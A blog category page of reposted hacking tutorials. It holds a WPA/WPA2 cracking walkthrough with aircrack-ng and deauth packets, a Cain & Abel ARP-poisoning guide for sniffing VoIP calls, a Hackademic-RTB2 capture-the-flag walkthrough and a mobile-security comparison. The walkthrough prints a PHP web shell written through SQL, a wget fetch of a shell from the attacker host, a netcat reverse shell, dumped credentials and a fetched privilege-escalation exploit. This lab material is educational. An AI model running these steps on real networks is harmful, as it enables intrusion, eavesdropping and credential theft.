'Hacking'에 해당되는 글 266건

  1. 2015.02.01 WIFI KALI LINUX HACKING by CEOinIRVINE
  2. 2015.01.13 VoIP Cain and Abel by CEOinIRVINE
  3. 2015.01.12 How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng by CEOinIRVINE
  4. 2015.01.08 Wireless Hacking by CEOinIRVINE
  5. 2014.08.19 Hackademic-RTB2 by CEOinIRVINE
  6. 2014.08.09 Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone by CEOinIRVINE
  7. 2014.08.06 Web Application Security by CEOinIRVINE
  8. 2014.06.12 Top 10 Most Searched Metasploit Exploit and Auxiliary Modules by CEOinIRVINE
  9. 2014.04.19 Must-Have Tools: Software mobile by CEOinIRVINE
  10. 2014.02.26 Background Monitoring on Non-Jailbroken iOS 7 Devices — and a Mitigation by CEOinIRVINE

WIFI KALI LINUX HACKING

Hacking 2015. 2. 1. 04:45

How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Written by 

          Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or want-to-be hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools, so any hacker who gains access to your network probably is no beginner!

These are things that you’ll need:

If you have these then roll up your sleeves and let’s see how secure your network is!

          Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router. 

By reading and/or using the information below, you are agreeing to 
our Disclaimer, which can be found here: http://lewiscomputerhowto.blogspot.com/disclaimor.html

Step One:

Start Kali Linux and login, preferably as root.

Step 1

Step Two: 

Plugin your injection-capable wireless adapter, (Unless your computer card supports it). If you’re using Kali in VMware, then you might have to connect the card via the imageicon in the device menu. 

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

Step 3

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the card and check that it supports monitor mode. You can check if the card supports monitor mode by typing ifconfig in another terminal, if the card is listed in ifconfig, but doesn’t show up in airmon-ng, then the card doesn’t support it.
You can see here that my card supports monitor mode and that it’s listed as wlan0.

Step Four:

Type airmon-ng start followed by the interface of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0

Step 4

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mine is mon0.

Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

Step 5

Step Six:

Airodump will now list all of the wireless networks in your area, and lots of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

step 6

Step Seven:

Copy the BSSID of the target network
Step 7
Now type this command: 
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).

A complete command should look like this: 
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

image

Now press enter.

Step Eight:

Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password. 
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them! 

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers use this tool to force a device to reconnect by sending deauthentication (deauth) packets to the device, making it think that it has to reconnect with the router.

Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step 8

Step Nine:

leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point (router)’s bssid, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the clients BSSID, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this: 
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step 9

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!
image

step 10

This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, the .cap one, that is important. Open a new Terminal, and type in this command: 
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password, the means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap
image

Now press Enter.

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, then you can congratulate the owner on being “Impenetrable,” of course, only after you’ve tried every wordlist that a hacker might use or make! 

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

image

The passphrase to our test-network was “notsecure,” and you can see here that aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.


'Hacking' 카테고리의 다른 글

Jessica  (0) 2016.03.11
CSD ExecGuide  (0) 2016.01.13
VoIP Cain and Abel  (0) 2015.01.13
How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng  (0) 2015.01.12
Wireless Hacking  (0) 2015.01.08
Posted by CEOinIRVINE
l

VoIP Cain and Abel

Hacking 2015. 1. 13. 12:22

How To Sniff VOIP Session Using Cain







According to wikipedia:


Voice over Internet Protocol (Voice over IP, VoIP) is one of a family of internet technologies, communication protocols, and transmission technologies for delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet. Other terms frequently encountered and often used synonymously with VoIP are IP telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, and broadband phone.

Cain is an excellent software which can be used for sniffing a VOIP, There are couple of methods to sniff a VOIP session but in this tutorial I will explain you how you can use a Man in the Middle Attack with Cain and Abel to sniff a VOIP conversation.

Sniff VOIP Session With Cain

So here is how you can capture a VOIP session on your network:

Step 1 - First of all download Cain  and install it.

Step 2 - Once cain is successfully installed go ahead and launch it, Now launch the sniffer by clicking on a small green button just below the file option

Step 3 - Next click on the blue "+" at the top, choose "All hosts in my subnet" and click ok



Step 4 - This will show you all the active hosts on your network.



Step 5 - Next goto ARP tab at the bottom and press the blue "+" sign, select the hosts on which you want to you want to perform a man in the middle attack and click ok


Step 6 - Now just click on the little yellow "Microtoxic" button at the top to launch the ARP Poisoning attack which is the real name for Man in the middle attack..



Step 7 -  Next click VOIP tab at the bottom and if cain has captured a VOIP session, you will get similar results.


I hope you have enjoyed reading the post, I will write also write an article on protecting your VOIP sessions in the upcoming posts.

Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .
- See more at: http://www.rafayhackingarticles.net/2011/04/how-to-sniff-voip-session-using-cain.html#sthash.dAIqj0HA.dpuf

How To Sniff VOIP Session Using Cain







According to wikipedia:


Voice over Internet Protocol (Voice over IP, VoIP) is one of a family of internet technologies, communication protocols, and transmission technologies for delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet. Other terms frequently encountered and often used synonymously with VoIP are IP telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, and broadband phone.

Cain is an excellent software which can be used for sniffing a VOIP, There are couple of methods to sniff a VOIP session but in this tutorial I will explain you how you can use a Man in the Middle Attack with Cain and Abel to sniff a VOIP conversation.

Sniff VOIP Session With Cain

So here is how you can capture a VOIP session on your network:

Step 1 - First of all download Cain  and install it.

Step 2 - Once cain is successfully installed go ahead and launch it, Now launch the sniffer by clicking on a small green button just below the file option

Step 3 - Next click on the blue "+" at the top, choose "All hosts in my subnet" and click ok



Step 4 - This will show you all the active hosts on your network.



Step 5 - Next goto ARP tab at the bottom and press the blue "+" sign, select the hosts on which you want to you want to perform a man in the middle attack and click ok


Step 6 - Now just click on the little yellow "Microtoxic" button at the top to launch the ARP Poisoning attack which is the real name for Man in the middle attack..



Step 7 -  Next click VOIP tab at the bottom and if cain has captured a VOIP session, you will get similar results.


I hope you have enjoyed reading the post, I will write also write an article on protecting your VOIP sessions in the upcoming posts.

Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .
- See more at: http://www.rafayhackingarticles.net/2011/04/how-to-sniff-voip-session-using-cain.html#sthash.dAIqj0HA.dpuf

http://www.rafayhackingarticles.net/2011/04/how-to-sniff-voip-session-using-cain.html

'Hacking' 카테고리의 다른 글

CSD ExecGuide  (0) 2016.01.13
WIFI KALI LINUX HACKING  (0) 2015.02.01
How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng  (0) 2015.01.12
Wireless Hacking  (0) 2015.01.08
Hackademic-RTB2  (0) 2014.08.19
Posted by CEOinIRVINE
l

How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Hacking 2015. 1. 12. 07:48

Search For Other Kali Solutions


How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng

Written by

          Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or want-to-be hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools, so any hacker who gains access to your network probably is no beginner!

These are things that you’ll need:

If you have these then roll up your sleeves and let’s see how secure your network is!

          Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router.

By reading and/or using the information below, you are agreeing to
our Disclaimer, which can be found here: http://lewiscomputerhowto.blogspot.com/disclaimor.html

Step One:

Start Kali Linux and login, preferably as root.

Step 1

Step Two:

Plugin your injection-capable wireless adapter, (Unless your computer card supports it). If you’re using Kali in VMware, then you might have to connect the card via the imageicon in the device menu.

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

Step 3

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the card and check that it supports monitor mode. You can check if the card supports monitor mode by typing ifconfig in another terminal, if the card is listed in ifconfig, but doesn’t show up in airmon-ng, then the card doesn’t support it.
You can see here that my card supports monitor mode and that it’s listed as wlan0.

Step Four:

Type airmon-ng start followed by the interface of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0

Step 4

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface, mine is mon0.

Step Five:

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

Step 5

Step Six:

Airodump will now list all of the wireless networks in your area, and lots of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

step 6

Step Seven:

Copy the BSSID of the target network
Step 7
Now type this command:
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0).

A complete command should look like this:
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

image

Now press enter.

Step Eight:

Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers use this tool to force a device to reconnect by sending deauthentication (deauth) packets to the device, making it think that it has to reconnect with the router.

Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step 8

Step Nine:

leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point (router)’s bssid, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the clients BSSID, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this:
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step 9

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets, and within moments, you should see this message appear on the airodump-ng screen!
image

step 10

This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, the .cap one, that is important. Open a new Terminal, and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password, the * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap
image

Now press Enter.

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, then you can congratulate the owner on being “Impenetrable,” of course, only after you’ve tried every wordlist that a hacker might use or make!

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

image

The passphrase to our test-network was “notsecure,” and you can see here that aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.

 

Please use this information only in legal ways

Lewis Encarnacion

 


 

Keywords , , , , , , ,



'Hacking' 카테고리의 다른 글

WIFI KALI LINUX HACKING  (0) 2015.02.01
VoIP Cain and Abel  (0) 2015.01.13
Wireless Hacking  (0) 2015.01.08
Hackademic-RTB2  (0) 2014.08.19
Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone  (0) 2014.08.09
Posted by CEOinIRVINE
l

Wireless Hacking

Hacking 2015. 1. 8. 23:23

'Hacking' 카테고리의 다른 글

VoIP Cain and Abel  (0) 2015.01.13
How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng  (0) 2015.01.12
Hackademic-RTB2  (0) 2014.08.19
Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone  (0) 2014.08.09
Web Application Security  (0) 2014.08.06
Posted by CEOinIRVINE
l

Hackademic-RTB2

Hacking 2014. 8. 19. 05:22

Hackademic-RTB2

Introduction

Description

Hackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here.

Installation

Hackademic RTB2 can be downloaded from following places:

Check the md5sum: 4c35e875e0ae2f872af6751f259b82b7

Environment

  • Attacker: 192.168.1.43 (BackTrack 5 R2)
  • Victim: 192.168.1.9 (VMWare Fusion)

Should you need to discover the IP address of your target, use tools like fpingnetdiscover or nmap.

Challenge

Assessment

Services/Versions

A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that looks filtered:

root@bt:~# nmap -sS 192.168.1.9

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-08 07:57 EDT
Nmap scan report for 192.168.1.9
Host is up (0.00072s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:E5:3D:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

A complete scan (against TCP and UDP) provides us with following results:

root@bt:/pentest/database/sqlmap# nmap -sS -sU -A 192.168.1.10

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-07 16:36 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00036s latency).
Not shown: 1950 closed ports, 47 open|filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
666/tcp  open  http    Apache httpd 2.2.14 ((Ubuntu))
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
5353/udp open  mdns    DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.1.10 2a01:e35:8b15:3430:20c:29ff:fee5:3dec
MAC Address: 00:0C:29:E5:3D:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.1.10

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1119.53 seconds

It shows that port 666/tcp is now opened and hosting a web service. We think of port knowcking. There is also a DNS based service on port 5353/udp.

Web service

Let's analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:

Hackademic-RTB2-001.png

Using dirbuster also discloses the presence of a phpmyadmin interface:

Hackademic-RTB2-002.png

Find vulnerabilities in the first form

Let's try to find a vulnerability in the first authentication form. I have used W3AF as well as Sqlmap but have found no SQL injection. Using fuzzing techniques with BurpSuite (Intruder module) against the password field leads to the discovery of an SQL injection:

Hackademic-RTB2-003.png

Notice that it's a real fuzzing exercise here (I must confess it's also a little bit by chance) to discover the injection (you will have to use the full list of SQL injection strings from BurpSuite as well as suffixing them with a simple quote. On the other way, the authentication mechanism doesn't make use of a database. The PHP code will show that the following combination is hard coded:

  • login: admin
  • password: ' or 1=1 --'

Anyway, this combination leads to a new message as well as as long encoded string:

Hackademic-RTB2-004.png

Find the port-knocking combination

First decode the URL based message. It looks like a hex-encoded string. Use online resources to decode it (e.g. http://home.paulschou.net/tools/xlate/):

Hackademic-RTB2-005.png

The hint "Knock knock knockin' on heaven's door" now confirms that this string will lead to the port knocking combination. Let's copy the binary message, paste it in the binary field and decode it:

Hackademic-RTB2-006.png

Open port 666/tcp

The combination is: 1001:1101:1011:1001. Let's consider it's a suite of TCP ports to open port 666/tcp on the target. We will use netcat to compose the sesame:

# for i in 1001 1101 1011 1001; do nc -z 192.168.1.9 $i; done

Let's check that it has opened the service by pointing to http://192.168.1.19:666. It's working, we can see the welcome page of a Joomla v1.5 portal.

Find a vulnerability in the second application

Now, time to find a vulnerability in the second application, the Joomla portal. Let's try to find a SQL injection. Sqlmap leads to the disclosure of the MySQL users:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D mysql -T user -C User,Password --dump
+-------------------------------------------+------------------+
| Password                                  | User             |
+-------------------------------------------+------------------+
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | root             |
| *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996 | debian-sys-maint |
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | phpmyadmin       |
+-------------------------------------------+------------------+

However, these hashes haven't been reversed in the past and, though John The Ripper could help, it would take hours, days, ... to crack?

Let's try to dump the users from the Joomla database:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   -D joomla -T jos_users -C name,password,username,usertype --dump
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| name           | password                                                          | username      | usertype              |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| Administrator  | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl | Administrator | Super%20Administrator |
| John%20Smith   | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF | JSmith        | Registered            |
| Billy%20Tallor | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy | BTallor       | Registered            |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+

But once again, trying to reverse the hashes is not straightforward. However, sqlmap offers the ability to read files. Let's try to read the configuration file:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   --file-read="/var/www/configuration.php"
/var/www/configuration.php file saved to:    
'/pentest/database/sqlmap/output/192.168.1.9/files/_var_www_configuration.php'

Let's see what's inside:

root@bt:/pentest/database/sqlmap# egrep -i "user|password" output/192.168.1.9/files/_var_www_configuration.php 
var $user = 'root';
var $password = 'yUtJklM97W';
var $ftp_user = ;
var $offset_user = '0';
var $smtpuser = ;

Set up a backdoor

Now that we have the password for root, let's connect to the phpmyadmin interface. Go to http://192.168.1.9/phpmyadmin and use the above credentials.

Open a SQL window and create a rudimentary shell that we will use to download a more sophisticated one:

select "<?php system($_GET[\"cmd\"]); ?>" > into outfile "/var/www/shell.php"

Let's test it:

Hackademic-RTB2-007.png

Now, let's download a more sophisticated PHP shell. Download it on your Bakctrack distribution, uncompress it in your /var/www/ directory and start your webserver (/etc/init.d/apache2 start).

From your browser, use following commands:

http://192.168.1.9:666/shell.php?cmd=wget%20http://192.168.1.43/phpshell.txt

The above command will download the PHP shell. Now let's modify the extension to php:

http://192.168.1.9:666/shell.php?cmd=mv%20/var/www/phpshell.txt%20/var/www/phpshell.php

You should now be able to access your PHP shell:

Hackademic-RTB2-008.png

Reverse shell

To use the reverse shell, open a socket on your Backtrack with netcat:

nc -lvvp 5555

And from the "Back Connect" feature (top menu of the PHP shell interface), configure it as follows:

Hackademic-RTB2-009.png

From your Backtrack terminal, you now have a complete shell to the machine, with limited privileges:

root@bt:~# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.9: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.9] 48972
expr: syntax error
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /root
cd: 3: can't cd to /root
uname -a
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Privileges escalation

After some researches on http://www.exploit-db.com, you will find an exploit that works (http://www.exploit-db.com/download/14814).

From your reverse shell, download it, compile it and execute it:

wget http://www.exploit-db.com/download/14814 -O 14814.c
gcc 14814.c -o 14814
chmod +x 14814
./14814
id
uid=0(root) gid=0(root)

Decrypt the key

The Key.txt in /root contains a base64 hash. Let's decrypt it and see what it is:

base64 -d Key.txt > output
file output
output: PNG image, 756 x 344, 8-bit/color RGB, non-interlaced

It's a PNG image. Let's copy it in /var/www:

mv output /var/www/

Here is it:

Hackademic-009.png


'Hacking' 카테고리의 다른 글

How To Hack Test Your WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng  (0) 2015.01.12
Wireless Hacking  (0) 2015.01.08
Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone  (0) 2014.08.09
Web Application Security  (0) 2014.08.06
Top 10 Most Searched Metasploit Exploit and Auxiliary Modules  (0) 2014.06.12
Posted by CEOinIRVINE
l

Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone

Hacking 2014. 8. 9. 01:07

Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone

 / June 5, 2014

e BYOD phenomenon is old news, with support from most companies. For IT organizations, that means ensuring proper security and management over the mobile devices employees are likely to use. In the last year, Apple’s iPhone and iPad have become the new corporate standardsdue to high user satisfaction and superior security capabilities. iOS 7 pushes Apple’s management and security into new areas, including application management and licensing.

But Samsung has been aggressively promoting its SAFE (Samsung Approved for Enterprise) extensions to Android and its add-on Knox management APIs to bolster its reach into businesses wary of Google’s historic lack of concern for security and the rampant malware on Android devices. SAFE targets the first concern. BlackBerry, once the IT darling due to its hundreds of security capabilities, is also trying to gain corporate respect with BlackBerry 10, which supports basic Exchange ActiveSync (EAS) policies out of the box (a first for BlackBerry), as well as a rich set of security features in its retooled BES 10 management server.

Then there’s Windows Phone 8, the third version of Microsoft’s attempt to deliver a popular smartphone OS. It’s historically given little heed to security concerns, but Version 8 endeavors to satisfy basic business security concerns. And the forthcoming Windows Phone 8.1 increases its capabilities even further.

Mobile security falls into two fundamental forms: Microsoft’s EAS policies and native APIs.

Exchange ActiveSync policy support compared
Microsoft Exchange, Microsoft System Center 2012, Google Docs for Business, and various third-party management tools support EAS policies out of the box. According to mobile analyst Chris Hazelton at the 451 Group, the core EAS policies cover most businesses’ needs. But as Table 1 on the next page shows, the various mobile OSes support different EAS policies; EAS support in and of itself doesn’t tell you what security level you get.

Apple’s iOS 4.2 was the first major modern mobile OS to support EAS policies, and it helped catapult the iPhone to enterprise dominance. Since then, Google has increased Android’s EAS coverage in each version, with Android 4 supporting more EAS policies than previous versions. Samsung, the leading Android maker, has added policy support as well as APIs to Android 4 to many of its devices. (I detail which EAS policies each version of Android and Windows Phone support in the article “How Windows Phone 8 security compares to iOS and Android.”)

When you compare Windows Phone 8’s EAS policy support to that of Windows Phone 7.5, there’s not much difference. “Microsoft has not really added much on the management end,” notes J.P. Halebeed, global director of R&D at mobile device management (MDM) vendor AirWatch. A critical addition is support for encryption on the device (it’s on by default for internal storage, but not for SD cards) and the related support for EAS’s encryption policies. The lack of support for encryption had been one of the biggest barriers to Windows Phone’s business acceptance. Microsoft also supports the new information rights management (IRM) EAS policy, which lets companies enable rights management for data on devices; Microsoft of course has a corresponding IRM server product. But Windopws Phone 8.1 does make some real leaps forward, as the tables in this article show.

Finally, BlackBerry added EAS support to the new BlackBerry 10 OS; previous versions could be secured only through the BlackBerry Enterprise Server (BES).

Table 1: EAS policy support compared

(“MDM” means a separate mobile device management server is required)

 AppleGoogleSamsungBlackBerryMicrosoft
PolicyiOS 6, 7Android 4Android 4 + SAFEBlackBerry 10Windows Phone 8
Allow device encryptionYesYesYesYesYes
Require device encryptionYesNoMDMYesYes
Encrypt storage cardNAYesYesNoYes
Minimum password lengthYesYesYesYesYes
Minimum number of complex characters (password)YesYesYesYesYes
Password historyYesYesYesYesYes
Device wipe thresholdYesYesYesYesYes
Disable removable storageMDMNoMDMNo**No
Disable cameraYesYesYesNo**No
Disable SMS text messagingNoNoNoNoNo
Disable Wi-FiMDMNoMDMNoNo**
Disable BluetoothMDMNoMDMNo**No
Disable IrDANANoNoNoNo
Require manual sync while roamingYesYesYesNo**No
Allow Internet sharing from deviceMDMNoMDMNo**MDM
Allow desktop sharing from deviceMDMNoMDMNoNo
Disable email attachment accessYesYesYesNoYes
Disable POP3/IMAP4 emailMDMNoNoYesNo
Allow consumer emailNoNoNoNoNo
Allow browserYesMDMMDMNoMDM
Configure message formats (HTML or plain text)NoNoNoNoNo
Include past email items (days)YesNoNoYesYes
Email body truncation size (KB)NoNoNoNoNo**
HTML email body truncation size (KB)NoNoNoNoNo**
Include past calendar items (days)NoNoNoYesNo
Require signed S/MIME messagesNoNoNoNoNo**
Require encrypted S/MIME messagesNoNoNoNoNo**
Require signed S/MIME algorithmNoNoNoNoNo**
Require encrypted S/MIME algorithmNoNoNoNoNo**
Allow S/MIME encrypted algorithm negotiationNoNoNoNoNo**
